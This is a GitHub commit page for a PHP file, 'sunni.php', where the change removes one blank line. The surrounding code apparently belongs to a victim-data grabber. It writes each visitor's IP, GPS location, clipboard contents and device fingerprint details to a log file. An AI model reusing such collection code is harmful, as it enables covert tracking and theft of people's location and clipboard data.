Skip to content

Commit

Permalink
Update sunni.php
Browse files Browse the repository at this point in the history
  • Loading branch information
swagkarna authored Jun 21, 2022
1 parent fe24fa7 commit 0647eda
Showing 1 changed file with 0 additions and 1 deletion.
1 change: 0 additions & 1 deletion sunni.php
Original file line number Diff line number Diff line change
Expand Up @@ -25,5 +25,4 @@
fwrite($file, "Ip Address: " .$ip."\n\n".
"Country: ".$ulke ."\n\n"."NetworkInformation: ".$networkinfo."\n\n"."Batterypercentage: ".$batterypercentage."\n\n"."Ischarging: ".$ischarging."\n\n"."ScreenWidth: ".$width."\n\n" ."ScreeHeight: ".$height."\n\n" ."Platform: ".$platform."\n\n" ."GPS: ".$gps."\n\n" ."DeviceLocalTime: ".$localtime."\n\n" ."DeviceLanguage: ".$devicelang."\n\n" ."CookieEnabled: ".$iscookieEnabled."\n\n" ."UserAgent: ".$useragent."\n\n" ."DeviceMemory: ".$deviceram."\n\n" ."CPuThreads: ".$cpuThreads."\n\n" ."Clipboard: ".$clipboard."\n\n"."ReferUrl: ".$referurl."\n\n\n\n");
fclose($file);

?>

0 comments on commit 0647eda

Please sign in to comment.